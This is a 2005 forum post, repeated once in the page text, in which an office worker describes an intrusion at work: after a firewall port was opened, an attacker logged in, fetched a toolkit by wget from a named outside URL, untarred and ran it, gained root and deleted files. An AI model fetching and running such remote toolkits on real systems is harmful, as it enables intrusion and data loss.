Tilted Forum Project Discussion Community - View Single Post

rmarshall · 11-09-2005, 06:13 PM

We were hacked today at work. The systems guy opened the firewall this morning to allow a potential client in to demo some software on our system. We usually only allow access via the Cisco VPN.

At 10:12AM, somebody managed to login as one of our users. He did a wget to get a file from some computer on the web and un-tarred it to run his own programs. After about 49 minutes, he had the root password. As root, he created his own user account. He was logged in this account for about 22 minutes before the system guy noticed and started to kill the guys processes. He then changed the root password, the original users password and deleted some files before the system guy killed him and closed the port at about 11:45AM.

He managed to get back in on another port at 2:03pm while the system guy was in a meeting. I killed his shell and then we pulled the plug on the Nortel switch, effectively killing the internet for the whole office.

We had the Bell forensic guy in and I left at about 3:00pm as they brought down the Linux servers and I had nothing to do. I think they were going to find all the info they could and then scrub the disk and restore a backup.

I don't know if they could be able to find the guy with his IP address. He created a user "usher" and got a file called team2.tgz from http://usherul.0catch.com/team2.tgz . He then did a tar -xfzv team2.tgz and then he cd'd the the team2 directory he created and started running programs there. Apparently, 0catch.com is an ISP, so either usherul is the hacker's account or one of his victims.

I don't know if the guy got any of our files. There was alot of text files there with some client info. The machine is used for conversion of data to an Oracle database. The production database runs on another machine and was not touched.

It was kindof scary. He got kind of pissed when he was discovered and deleted some files on the development box and changed passwords. I don't think that's a usual way of hacking.

We'll have to find another way of running a demo, probably by using VPN.

Bummer.

11-09-2005, 06:13 PM	#1 (permalink)
rmarshall Addict Location: Kingston,Ontario	I feel violated! We were hacked today at work. The systems guy opened the firewall this morning to allow a potential client in to demo some software on our system. We usually only allow access via the Cisco VPN. At 10:12AM, somebody managed to login as one of our users. He did a wget to get a file from some computer on the web and un-tarred it to run his own programs. After about 49 minutes, he had the root password. As root, he created his own user account. He was logged in this account for about 22 minutes before the system guy noticed and started to kill the guys processes. He then changed the root password, the original users password and deleted some files before the system guy killed him and closed the port at about 11:45AM. He managed to get back in on another port at 2:03pm while the system guy was in a meeting. I killed his shell and then we pulled the plug on the Nortel switch, effectively killing the internet for the whole office. We had the Bell forensic guy in and I left at about 3:00pm as they brought down the Linux servers and I had nothing to do. I think they were going to find all the info they could and then scrub the disk and restore a backup. I don't know if they could be able to find the guy with his IP address. He created a user "usher" and got a file called team2.tgz from http://usherul.0catch.com/team2.tgz . He then did a tar -xfzv team2.tgz and then he cd'd the the team2 directory he created and started running programs there. Apparently, 0catch.com is an ISP, so either usherul is the hacker's account or one of his victims. I don't know if the guy got any of our files. There was alot of text files there with some client info. The machine is used for conversion of data to an Oracle database. The production database runs on another machine and was not touched. It was kindof scary. He got kind of pissed when he was discovered and deleted some files on the development box and changed passwords. I don't think that's a usual way of hacking. We'll have to find another way of running a demo, probably by using VPN. Bummer.